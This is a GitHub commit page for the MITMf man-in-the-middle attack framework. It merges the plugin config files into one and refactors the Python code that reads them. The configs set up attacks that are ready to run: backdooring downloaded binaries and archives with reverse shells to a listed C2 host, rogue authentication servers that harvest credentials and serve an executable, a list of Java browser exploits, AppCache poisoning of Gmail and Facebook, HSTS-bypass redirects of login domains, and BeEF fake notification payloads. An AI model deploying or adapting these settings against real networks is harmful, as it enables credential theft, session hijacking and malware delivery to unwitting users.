github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-14 17:13:50 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

- All config files now consolidated into a single file

Browse source 
- Added 'args' option in config file
- HSTS bypass is now a plugin (SSLstrip+)
- SMBAuth now defaults to specified interface IP if --host is not passed
- Modified plugins for new config support
- Changed appoison and responder plugin for ConfigObj library support
- Minor visual argparse changes
- Slapped santa on the head with a trout
- Gave rudolf a new nose
This commit is contained in:
byt3bl33d3r 2014-12-26 13:36:55 +01:00
parent f359ee7cdd
commit 846f85426c
24 changed files with 531 additions and 436 deletions
Download patch file Download diff file Expand all files Collapse all files

1
README.md
View file

@ -9,6 +9,7 @@ This tool is completely based on sergio-proxy https://code.google.com/p/sergio-p
Availible plugins:
- Responder - LLMNR, NBT-NS and MDNS poisoner
- SSLstrip+ - Partially bypass HSTS
- Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries
- BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
- AppCachePoison - Perform app cache poison attacks

53
config/app_cache_poison.cfg
View file

@ -1,53 +0,0 @@
[DEFAULT]
; HTML5 AppCache poisioning attack
; see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
; generic settings for tampering engine
templates_path=config/app_cache_poison_templates
;enable_only_in_useragents=Chrome|Firefox
; when visiting first url matching following expression we will embed iframes with all tamper URLs
;(to poison the cache for all of them all at once)
mass_poison_url_match=http://.*prezydent\.pl.*
; it's only useful to mass poison chrome because:
; - it supports iframe sandbox preventing framebusting
; - does not ask for confirmation
mass_poison_useragent_match=Chrome|Safari
[test]
; any //example.com URL redirects to iana and will display our spoofed content
tamper_url=http://example.com/
manifest_url=http://www.iana.org/robots.txt ;use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
templates=test ; which templates to use for spoofing content?
skip_in_mass_poison=1
; use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
[gmail]
tamper_url=http://mail.google.com/mail/
; manifest has to be of last domain in redirect loop
manifest_url=http://mail.google.com/robots.txt
templates=default ; could be omitted
[facebook]
tamper_url=http://www.facebook.com/
manifest_url=http://www.facebook.com/robots.txt
templates=facebook ; use different template
[twitter]
tamper_url=http://twitter.com/
;tamper_url_match=^http://(www\.)?twitter\.com/$
manifest_url=http://twitter.com/robots.txt
[testing]
tamper_url=http://www.html5rocks.com/en/
manifest_url=http://www.html5rocks.com/robots.txt
; we can also modify non-HTML URLs to append malicious code to them
; but for them to be cached in HTML5 AppCache they need to be referred in
; manifest for a poisoned domain
; if not, they are "only" cached for 10 years :D
[ga]
raw_url=http://www.google-analytics.com/ga.js
templates=script
skip_in_mass_poison=1
;you can add other scripts in additional sections like jQuery etc.

32
config/beefautorun.cfg
View file

@ -1,32 +0,0 @@
#Example config file for the BeefAutorun plugin
mode = oneshot
#can be set to loop, or oneshot
#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
#in oneshot mode the plugin will run modules only once per hooked browser
[ALL] #Runs specified modules on all hooked browsers
'Man-In-The-Browser'= '{}'
[targets] #Runs specified modules based on OS and Browser type
[[Windows]] #Target all Windows versions using Firefox and Internet Explorer
[[[FF]]]
'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
[[[IE]]]
'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'
[[Windows 7]] #Target only Windows 7 using Chrome
[[[C]]]
'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'
[[Linux]] #Target Linux platforms using Chrome
[[[C]]]
'Redirect Browser (Rickroll)' = '{}'

4
config/dhcp.cfg
View file

@ -1,4 +0,0 @@
#Example config file for DHCP spoofing
ip_pool = 192.168.2.10-50
subnet = 255.255.255.0
dns_server = 192.168.2.20 #optional

3
config/dns.cfg
View file

@ -1,3 +0,0 @@
#Example config file for DNS tampering
www.facebook.com = 192.168.10.1
google.com = 192.168.10.1

122
config/filepwn.cfg
View file

@ -1,122 +0,0 @@
"""
BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
Tested on Kali-Linux.
"""
[ZIP]
# patchCount is the max number of files to patch in a zip file
# After the max is reached it will bypass the rest of the files
# and send on it's way
patchCount = 5
# In Bytes
maxSize = 40000000
blacklist = .dll, #don't do dlls in a zip file
[TAR]
# patchCount is the max number of files to patch in a tar file
# After the max is reached it will bypass the rest of the files
# and send on it's way
patchCount = 5
# In Bytes
maxSize = 40000000
blacklist = , # a comma is null do not leave blank
[targets]
#MAKE SURE that your settings for host and port DO NOT
# overlap between different types of payloads
[[ALL]] # DEFAULT settings for all targets REQUIRED
LinuxType = ALL # choices: x86/x64/ALL/None
WindowsType = ALL # choices: x86/x64/ALL/None
FatPriority = x64 # choices: x86 or x64
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
CompressedFiles = True #True/False
[[[LinuxIntelx86]]]
SHELL = reverse_shell_tcp # This is the BDF syntax
HOST = 192.168.1.168 # The C2
PORT = 8888
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
[[[LinuxIntelx64]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 9999
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[WindowsIntelx86]]]
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
HOST = 192.168.1.16
PORT = 8443
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = None
ZERO_CERT = False
PATCH_DLL = True
MSFPAYLOAD = windows/shell_reverse_tcp
[[[WindowsIntelx64]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.1.16
PORT = 8088
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = Nonepatchpatchpatch
ZERO_CERT = True
PATCH_DLL = False
MSFPAYLOAD = windows/x64/shell_reverse_tcp
[[[MachoIntelx86]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 4444
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[MachoIntelx64]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 5555
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp

11
config/hsts_bypass.cfg
View file

@ -1,11 +0,0 @@
#here you can configure your domains to bypass HSTS on
#the format is real.domain.com = fake.domain.com
#for google and gmail
accounts.google.com = account.google.com
mail.google.com = gmail.google.com
accounts.google.se = cuentas.google.se
#for facebook
www.facebook.com = social.facebook.com
facebook.com = social.facebook.com

27
config/javapwn.cfg
View file

@ -1,27 +0,0 @@
# All versions strings without a * are considered vulnerable if clients Java version is <= update version
# When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
[Multi] #Cross platform exploits, yay java! <3
multi/browser/java_rhino = 1.6.0.28, 1.7.0.28
multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16
multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26
multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2
multi/browser/java_jre17_exec = 1.7.0.6
multi/browser/java_jre17_jaxws = 1.7.0.7
multi/browser/java_jre17_jmxbean = 1.7.0.10
multi/browser/java_jre17_jmxbean_2 = 1.7.0.11
multi/browser/java_jre17_reflection_types = 1.7.0.17
multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37
multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
multi/browser/java_jre17_method_handle = 1.7.0.7
multi/browser/java_jre17_driver_manager = 1.7.0.17
multi/browser/java_jre17_provider_skeleton = 1.7.0.21
multi/browser/java_storeimagearray = 1.7.0.21
multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11
[Windows] #These are windows specific
windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
windows/browser/java_cmm = 1.6.0.41, 1.7.0.15
windows/browser/java_mixer_sequencer = 1.6.0.18

363
config/mitmf.cfg
View file

@ -1,10 +1,355 @@
[BeEF]
beefip = 127.0.0.1
beefport = 3000
user = beef
pass = beef
#MITMf configuration
[Metasploit]
msfport = 8080 #Port to start webserver for exploits
rpcip = 127.0.0.1
rpcpass = abc123
[MITMf]
#here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py``` (assuming you config file is in the default directory)
args=''
#Required BeEF and Metasploit options
[[BeEF]]
beefip = 127.0.0.1
beefport = 3000
user = beef
pass = beef
[[Metasploit]]
msfport = 8080 #Port to start webserver for exploits
rpcip = 127.0.0.1
rpcpass = abc123
#-----------------------------------------------------------------------------------------------------------------------------------------#
#Plugin configuration starts here
[Spoof]
[[DHCP]]
ip_pool = 192.168.2.10-50
subnet = 255.255.255.0
dns_server = 192.168.2.20 #optional
[[DNS]]
www.facebook.com = 192.168.10.1
google.com = 192.168.10.1
[Responder]
#Set these values to On or Off, so you can control which rogue authentication server is turned on.
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
##Listen on 25/TCP, 587/TCP
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
#Set a custom challenge
Challenge = 1122334455667788
#Set this to change the default logging file
SessionLog = Responder-Session.log
#Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
#RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
RespondTo =
#Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
#RespondTo = WPAD,DEV,PROD,SQLINT
RespondToName =
#DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
DontRespondTo =
#Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
DontRespondToName =
[[HTTP Server]]
#Set this to On if you want to always serve a specific file to the victim.
Serve-Always = Off
#Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
Serve-Exe = Off
#Uncomment and specify a custom file to serve, the file must exist.
Filename = config/responder/Denied.html
#Specify a custom executable file to serve, the file must exist.
ExecFilename = config/responder/FixInternet.exe
#Set your custom PAC script
WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'
[[HTTPS Server]]
#Change to use your certs
cert = config/responder/certs/responder.crt
key = config/responder/certs/responder.key
[BeEFAutorun]
#Example config for the BeefAutorun plugin
mode = oneshot
#can be set to loop, or oneshot
#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
#in oneshot mode the plugin will run modules only once per hooked browser
[[ALL]] #Runs specified modules on all hooked browsers
'Man-In-The-Browser'= '{}'
[[targets]] #Runs specified modules based on OS and Browser type
[[[Windows]]] #Target all Windows versions using Firefox and Internet Explorer
[[[[FF]]]]
'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
[[[[IE]]]]
'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'
[[[Windows 7]]] #Target only Windows 7 using Chrome
[[[[C]]]]
'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'
[[[Linux]]] #Target Linux platforms using Chrome
[[[[C]]]]
'Redirect Browser (Rickroll)' = '{}'
[AppCachePoison]
# HTML5 AppCache poisioning attack
# see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
# generic settings for tampering engine
#enable_only_in_useragents=Chrome|Firefox
templates_path=config/app_cache_poison_templates
# when visiting first url matching following expression we will embed iframes with all tamper URLs
#(to poison the cache for all of them all at once)
mass_poison_url_match=http://.*prezydent\.pl.*
# it's only useful to mass poison chrome because:
# - it supports iframe sandbox preventing framebusting
# - does not ask for confirmation
mass_poison_useragent_match=Chrome|Safari
[[test]]
# any //example.com URL redirects to iana and will display our spoofed content
tamper_url=http://example.com/
manifest_url=http://www.iana.org/robots.txt #use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
templates=test # which templates to use for spoofing content?
skip_in_mass_poison=1
[[gmail]]
#use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
tamper_url=http://mail.google.com/mail/
# manifest has to be of last domain in redirect loop
manifest_url=http://mail.google.com/robots.txt
templates=default # could be omitted
[[facebook]]
tamper_url=http://www.facebook.com/
manifest_url=http://www.facebook.com/robots.txt
templates=facebook # use different template
[[twitter]]
tamper_url=http://twitter.com/
#tamper_url_match=^http://(www\.)?twitter\.com/$
manifest_url=http://twitter.com/robots.txt
[[testing]]
tamper_url=http://www.html5rocks.com/en/
manifest_url=http://www.html5rocks.com/robots.txt
[[ga]]
# we can also modify non-HTML URLs to append malicious code to them
# but for them to be cached in HTML5 AppCache they need to be referred in
# manifest for a poisoned domain
# if not, they are "only" cached for 10 years :D
raw_url=http://www.google-analytics.com/ga.js
templates=script
skip_in_mass_poison=1
#you can add other scripts in additional sections like jQuery etc.
[JavaPwn]
# All versions strings without a * are considered vulnerable if clients Java version is <= update version
# When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
[[Multi]] #Cross platform exploits, yay java! <3
multi/browser/java_rhino = 1.6.0.28, 1.7.0.28
multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16
multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26
multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2
multi/browser/java_jre17_exec = 1.7.0.6
multi/browser/java_jre17_jaxws = 1.7.0.7
multi/browser/java_jre17_jmxbean = 1.7.0.10
multi/browser/java_jre17_jmxbean_2 = 1.7.0.11
multi/browser/java_jre17_reflection_types = 1.7.0.17
multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37
multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
multi/browser/java_jre17_method_handle = 1.7.0.7
multi/browser/java_jre17_driver_manager = 1.7.0.17
multi/browser/java_jre17_provider_skeleton = 1.7.0.21
multi/browser/java_storeimagearray = 1.7.0.21
multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11
[[Windows]] #These are windows specific
windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
windows/browser/java_cmm = 1.6.0.41, 1.7.0.15
windows/browser/java_mixer_sequencer = 1.6.0.18
[SSLstrip+]
#here you can configure your domains to bypass HSTS on
#the format is real.domain.com = fake.domain.com
#for google and gmail
accounts.google.com = account.google.com
mail.google.com = gmail.google.com
accounts.google.se = cuentas.google.se
#for facebook
www.facebook.com = social.facebook.com
facebook.com = social.facebook.com
#-----------------------------------------------------------------------------------------------------------------------------------------#
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
#
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
#
# Copyright (c) 2013-2014, Joshua Pitts
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Tested on Kali-Linux.
#-----------------------------------------------------------------------------------------------------------------------------------------#
[FilePwn]
[[ZIP]]
# patchCount is the max number of files to patch in a zip file
# After the max is reached it will bypass the rest of the files
# and send on it's way
patchCount = 5
# In Bytes
maxSize = 40000000
blacklist = .dll, #don't do dlls in a zip file
[[TAR]]
# patchCount is the max number of files to patch in a tar file
# After the max is reached it will bypass the rest of the files
# and send on it's way
patchCount = 5
# In Bytes
maxSize = 40000000
blacklist = , # a comma is null do not leave blank
[[targets]]
#MAKE SURE that your settings for host and port DO NOT
# overlap between different types of payloads
[[[ALL]]] # DEFAULT settings for all targets REQUIRED
LinuxType = ALL # choices: x86/x64/ALL/None
WindowsType = ALL # choices: x86/x64/ALL/None
FatPriority = x64 # choices: x86 or x64
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
CompressedFiles = True #True/False
[[[[LinuxIntelx86]]]]
SHELL = reverse_shell_tcp # This is the BDF syntax
HOST = 192.168.1.168 # The C2
PORT = 8888
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
[[[[LinuxIntelx64]]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 9999
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[[WindowsIntelx86]]]]
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
HOST = 192.168.1.16
PORT = 8443
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = None
ZERO_CERT = False
PATCH_DLL = True
MSFPAYLOAD = windows/shell_reverse_tcp
[[[[WindowsIntelx64]]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.1.16
PORT = 8088
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = Nonepatchpatchpatch
ZERO_CERT = True
PATCH_DLL = False
MSFPAYLOAD = windows/x64/shell_reverse_tcp
[[[[MachoIntelx86]]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 4444
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp
[[[[MachoIntelx64]]]]
SHELL = reverse_shell_tcp
HOST = 192.168.1.16
PORT = 5555
SUPPLIED_SHELLCODE = None
MSFPAYLOAD = linux/x64/shell_reverse_tcp

0
config/replace.cfg
View file

59
config/responder/responder.conf
View file

@ -1,59 +0,0 @@
[Responder Core]
;;
;Set these values to On or Off, so you can control which rogue authentication server is turned on.
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
;;Listen on 25/TCP, 587/TCP
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
;
;Set a custom challenge
Challenge = 1122334455667788
;
;Set this to change the default logging file
SessionLog = Responder-Session.log
;
;Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
;RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
RespondTo =
;Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
;RespondTo = WPAD,DEV,PROD,SQLINT
RespondToName =
;
;DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
DontRespondTo =
;Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
DontRespondToName =
;
[HTTP Server]
;;
;Set this to On if you want to always serve a specific file to the victim.
Serve-Always = Off
;
;Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
Serve-Exe = Off
;
;Uncomment and specify a custom file to serve, the file must exist.
Filename = config/responder/Denied.html
;
;Specify a custom executable file to serve, the file must exist.
ExecFilename = config/responder/FixInternet.exe
;
;Set your custom PAC script
WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
;
[HTTPS Server]
;
;Change to use your certs
cert = config/responder/certs/responder.crt
key = config/responder/certs/responder.key
;

96
libs/responder/Responder.py
View file

@ -16,7 +16,7 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys,struct,SocketServer,re,socket,thread,Fingerprint,random,os,ConfigParser,BaseHTTPServer, select,urlparse,zlib, string, time
import sys,struct,SocketServer,re,socket,thread,Fingerprint,random,os,BaseHTTPServer, select,urlparse,zlib, string, time
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer
from Fingerprint import RunSmbFinger,OsNameClientVersion
from odict import OrderedDict
@ -24,45 +24,6 @@ from socket import inet_aton
from random import randrange
from libs.sslstrip.DnsCache import DnsCache
VERSION = '2.1.2'
#Config parsing
config = ConfigParser.ConfigParser()
config.read("./config/responder/responder.conf")
# Set some vars.
On_Off = config.get('Responder Core', 'HTTP').upper()
SSL_On_Off = config.get('Responder Core', 'HTTPS').upper()
SMB_On_Off = config.get('Responder Core', 'SMB').upper()
SQL_On_Off = config.get('Responder Core', 'SQL').upper()
FTP_On_Off = config.get('Responder Core', 'FTP').upper()
POP_On_Off = config.get('Responder Core', 'POP').upper()
IMAP_On_Off = config.get('Responder Core', 'IMAP').upper()
SMTP_On_Off = config.get('Responder Core', 'SMTP').upper()
LDAP_On_Off = config.get('Responder Core', 'LDAP').upper()
DNS_On_Off = config.get('Responder Core', 'DNS').upper()
Krb_On_Off = config.get('Responder Core', 'Kerberos').upper()
NumChal = config.get('Responder Core', 'Challenge')
SessionLog = config.get('Responder Core', 'SessionLog')
Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
FILENAME = config.get('HTTP Server', 'Filename')
WPAD_Script = config.get('HTTP Server', 'WPADScript')
#HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
RespondTo = config.get('Responder Core', 'RespondTo').strip()
RespondTo.split(",")
RespondToName = config.get('Responder Core', 'RespondToName').strip()
RespondToName.split(",")
DontRespondTo = config.get('Responder Core', 'DontRespondTo').strip()
DontRespondTo.split(",")
DontRespondToName = config.get('Responder Core', 'DontRespondToName').strip()
DontRespondToName.split(",")
HTMLToServe = ''
if len(NumChal) is not 16:
sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n")
def IsOsX():
Os_version = sys.platform
if Os_version == "darwin":
@ -151,11 +112,6 @@ def PrintLLMNRNBTNS(outfile,Message):
return True
# Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
Challenge = ""
for i in range(0,len(NumChal),2):
Challenge += NumChal[i:i+2].decode("hex")
#Packet class handling all packet generation (see odict.py).
class Packet():
fields = OrderedDict([
@ -2021,8 +1977,8 @@ class SSlSock(ThreadingMixIn, TCPServer):
def __init__(self, server_address, RequestHandlerClass):
BaseServer.__init__(self, server_address, RequestHandlerClass)
ctx = SSL.Context(SSL.SSLv3_METHOD)
cert = config.get('HTTPS Server', 'cert')
key = config.get('HTTPS Server', 'key')
cert = SSLcert
key = SSLkey
ctx.use_privatekey_file(key)
ctx.use_certificate_file(cert)
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
@ -2483,7 +2439,51 @@ def serve_thread_SSL(host, port, handler):
except Exception, e:
print "[-] Error starting TCP server on port " + str(port) + ": " + str(e)
def start_responder(options, ip_address):
def start_responder(options, ip_address, config):
global VERSION; VERSION = '2.1.2'
# Set some vars.
global On_Off; On_Off = config['HTTP'].upper()
global SSL_On_Off; SSL_On_Off = config['HTTPS'].upper()
global SMB_On_Off; SMB_On_Off = config['SMB'].upper()
global SQL_On_Off; SQL_On_Off = config['SQL'].upper()
global FTP_On_Off; FTP_On_Off = config['FTP'].upper()
global POP_On_Off; POP_On_Off = config['POP'].upper()
global IMAP_On_Off; IMAP_On_Off = config['IMAP'].upper()
global SMTP_On_Off; SMTP_On_Off = config['SMTP'].upper()
global LDAP_On_Off; LDAP_On_Off = config['LDAP'].upper()
global DNS_On_Off; DNS_On_Off = config['DNS'].upper()
global Krb_On_Off; Krb_On_Off = config['Kerberos'].upper()
global NumChal; NumChal = config['Challenge']
global SessionLog; SessionLog = config['SessionLog']
global Exe_On_Off; Exe_On_Off = config['HTTP Server']['Serve-Exe'].upper()
global Exec_Mode_On_Off; Exec_Mode_On_Off = config['HTTP Server']['Serve-Always'].upper()
global FILENAME; FILENAME = config['HTTP Server']['Filename']
global WPAD_Script; WPAD_Script = config['HTTP Server']['WPADScript']
#HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
global SSLcert; SSLcert = config['HTTPS Server']['cert']
global SSLkey; SSLkey = config['HTTPS Server']['key']
global RespondTo; RespondTo = config['RespondTo'].strip()
RespondTo.split(",")
global RespondToName; RespondToName = config['RespondToName'].strip()
RespondToName.split(",")
global DontRespondTo; DontRespondTo = config['DontRespondTo'].strip()
DontRespondTo.split(",")
global DontRespondToName; DontRespondToName = config['DontRespondToName'].strip()
DontRespondToName.split(",")
HTMLToServe = ''
if len(NumChal) is not 16:
sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n")
# Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
global Challange; Challenge = ""
for i in range(0,len(NumChal),2):
Challenge += NumChal[i:i+2].decode("hex")
#Cli options.
global OURIP; OURIP = ip_address

22
libs/sslstrip/URLMonitor.py
View file

@ -18,7 +18,6 @@
import re, os
import logging
from configobj import ConfigObj
class URLMonitor:
@ -44,12 +43,7 @@ class URLMonitor:
self.redirects = []
self.faviconReplacement = False
self.hsts = False
hsts_config = ConfigObj("./config/hsts_bypass.cfg")
for k,v in hsts_config.items():
self.sustitucion[k] = v
self.real[v] = k
self.hsts_config = None
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
@ -138,9 +132,19 @@ class URLMonitor:
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
def setValues(self, faviconSpoofing, hstsbypass=False, clientLogging=False,):
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
self.hsts = hstsbypass
def setHstsBypass(self, hstsconfig):
if hstsconfig:
self.hsts = True
self.hsts_config = hstsconfig
for k,v in self.hsts_config.items():
self.sustitucion[k] = v
self.real[v] = k
def setClientLogging(self, clientLogging):
self.clientLogging = clientLogging
def isFaviconSpoofing(self):

35
mitmf.py
View file

@ -15,7 +15,7 @@ except:
sys.exit("[-] user_agents library not installed!")
try:
import configobj
from configobj import ConfigObj
except:
sys.exit("[-] configobj library not installed!")
@ -29,21 +29,23 @@ sergio_version = "0.2.1"
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="MITMf v%s - Framework for MITM attacks" % mitmf_version, epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@')
#add MITMf options
mgroup = parser.add_argument_group("MITMf", "Options for MITMf")
